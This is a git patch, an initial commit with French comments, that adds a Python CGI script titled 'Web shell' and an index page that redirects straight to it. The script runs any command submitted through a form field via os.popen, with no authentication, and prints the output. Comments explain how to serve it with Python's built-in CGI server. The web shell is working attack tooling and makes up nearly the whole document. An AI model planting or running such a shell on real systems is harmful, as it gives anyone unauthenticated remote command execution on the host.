From a1203ccb343703ba5ae522254f75b6384a1831a7 Mon Sep 17 00:00:00 2001
From: jerome <jerome@xlinfo.fr>
Date: Mon, 18 Dec 2023 00:02:09 +0100
Subject: =?UTF-8?q?dep=C3=B4t=20initial?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 html/cgi-bin/webshell.cgi | 35 +++++++++++++++++++++++++++++++++++
 html/index.html           | 12 ++++++++++++
 2 files changed, 47 insertions(+)
 create mode 100755 html/cgi-bin/webshell.cgi
 create mode 100644 html/index.html

(limited to 'html')

diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi
new file mode 100755
index 0000000..6598d37
--- /dev/null
+++ b/html/cgi-bin/webshell.cgi
@@ -0,0 +1,35 @@
+#!/usr/bin/env python3
+
+# après avoir lancé le serveur : python3 -m http.server --cgi
+# placer le script (rendu exécutable) dans /cgi-bin... 
+
+import cgi
+import os
+
+form = cgi.FieldStorage()
+cmd = form.getvalue('command')
+user = os.getlogin()
+host = os.environ.get('SERVER_NAME')
+pwd = os.environ.get('PWD')
+
+print("Content-Type: text/html; charset=UTF-8\n\n")
+print ("""
+<html>
+<head>
+<title>Web shell</title>
+</head>
+<body>
+<h1>Web shell</h1>
+<p>Entrez votre commande : </p>
+<form action=''>
+<input type='text' name='command' id='command' />
+<input type='submit' value='submit' />
+</form>""")
+if cmd : 
+    print("<pre style='display:inline-block;min-width:50em;padding:1em;background-color:black;color:white'>")
+    print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}")
+    print("</pre>")
+print("""
+<script>document.getElementById("command").focus()</script>
+</body>
+</html>""")
diff --git a/html/index.html b/html/index.html
new file mode 100644
index 0000000..ac28908
--- /dev/null
+++ b/html/index.html
@@ -0,0 +1,12 @@
+<!DOCTYPE>
+<html lang="en">
+<head>
+<title>redirection</title>
+<meta http-equiv="refresh" content="0;url=/cgi-bin/webshell.cgi" />
+</head>
+
+<body>
+
+</body>
+
+</html>
-- 
cgit v1.2.3